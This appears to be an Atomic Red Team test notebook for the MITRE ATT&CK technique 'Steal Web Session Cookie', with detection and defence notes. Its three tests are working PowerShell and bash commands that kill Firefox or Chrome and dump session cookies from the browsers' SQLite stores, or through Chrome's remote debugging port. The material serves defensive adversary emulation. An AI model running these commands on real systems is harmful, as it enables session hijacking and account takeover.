# T1539 - Steal Web Session Cookie
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

## Atomic Tests

### Atomic Test #1 - Steal Firefox Cookies (Windows)
This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function. 
Note: If Firefox is running, the process will be killed to ensure that the DB file isn't locked. 
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sqlite3 must exist at (#{sqlite3_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force

```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
stop-process -name "firefox" -force -erroraction silentlycontinue
$CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite"
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "$CookieDBLocation" | out-file -filepath "PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt"
```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 1

#### Cleanup: 
```powershell
remove-item PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Steal Chrome Cookies (Windows)
This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function. 
Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft. 
Note: If Chrome is running, the process will be killed to ensure that the DB file isn't locked. 
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sqlite3 must exist at (#{sqlite3_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force

```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
stop-process -name "chrome" -force -erroraction silentlycontinue
"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "$env:localappdata\Google\Chrome\User Data\Default\Network\Cookies" | out-file -filepath "PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt"
```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 2

#### Cleanup: 
```powershell
remove-item PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt
```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.

If successful, this test will output a list of cookies.

Note: Chrome processes will be killed during this test.

See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
**Supported Platforms:** macos

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Install Go
##### Check Prereq Commands:
```bash
go version
```
##### Get Prereq Commands:
```bash
brew install go
```
##### Description: Download and compile WhiteChocolateMacademiaNut
##### Check Prereq Commands:
```bash
/tmp/WhiteChocolateMacademiaNut/chocolate -h
```
##### Get Prereq Commands:
```bash
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
cd /tmp/WhiteChocolateMacademiaNut
go mod init chocolate
go mod tidy
go build
```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
killall 'Google Chrome'
sleep 1
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
sleep 1
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 3

#### Cleanup: 
```bash
rm -rf /tmp/WhiteChocolateMacademiaNut```

In [ ]:
Invoke-AtomicTest T1539 -TestNumbers 3 -Cleanup

## Detection
Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.


## Shield Active Defense
### Security Controls 
 Alter security controls to make the system more or less vulnerable to attack. 

 Manipulating security controls involves making configuration changes to the security settings of a system including things like modifying Group Policies, disabling/enabling autorun for removable media, and tightening or relaxing system firewalls, etc.
#### Opportunity
There is an opportunity to use security controls to stop or allow an adversary's activity.
#### Use Case
A defender can harden authentication mechanisms to ensure having just a session cookie is not enough to authenticate with another system.
#### Procedures
Weaken security controls on a system to allow for leaking of credentials via network connection poisoning.
Implement policies on a system to prevent the insecure storage of passwords in the registry. This may force an adversary to revert these changes or find another way to access cached credentials.
